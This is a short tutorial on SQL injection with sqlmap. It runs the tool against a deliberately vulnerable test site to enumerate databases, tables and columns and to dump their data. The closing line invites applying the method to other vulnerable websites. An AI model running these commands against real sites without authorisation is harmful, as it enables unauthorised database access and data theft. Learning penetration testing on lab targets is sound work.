SQL injection using SQLMAP

What is SQL injection?

SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

What is SQLMAP?

SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.

Where can you use SQLMAP?

When you notice a web URL with a structure like http://testphp.vulnweb.com/listproducts.php?cat=1, the website may be vulnerable to this kind of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when the site is PHP based.

A simple way to check whether your website is vulnerable is to replace the value of the GET request parameter with an asterisk (*). If you get an SQL error, then we can conclusively say that the website is vulnerable.

Installing sqlmap

sudo apt-get install sqlmap

In this tutorial, we will use a vulnerable website that is designed for testing purposes.

Open this link in your browser

http://testphp.vulnweb.com/listproducts.php?cat=1

1. List information about the existing databases

Open your terminal and type

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Where -u is for the URL and --dbs is for the database list.

The output shows us that there are two available databases, acuart and information_schema. In some cases, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type ‘Y’.

2. List information about the tables present in a particular database

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Where -u is for the URL, -D is for the database, and --tables is for the tables present in the database.

We see that 8 tables have been retrieved. So now we can say that the website is definitely vulnerable.

3. List information about the columns of a particular table

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists --columns

Where -u is for the URL, -D is for the database, -T is for the table, and --columns is for the columns present in the table.

3 columns found in ‘artists’ table in ‘acuart’ database

4. Dump the data from the columns

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists -C aname --dump

Where -C is for the column name and --dump is for dumping the data from the column.

You can see that we have accessed the data from the database.

Conclusion

Applying this method to such vulnerable websites, you can literally explore the databases to extract information.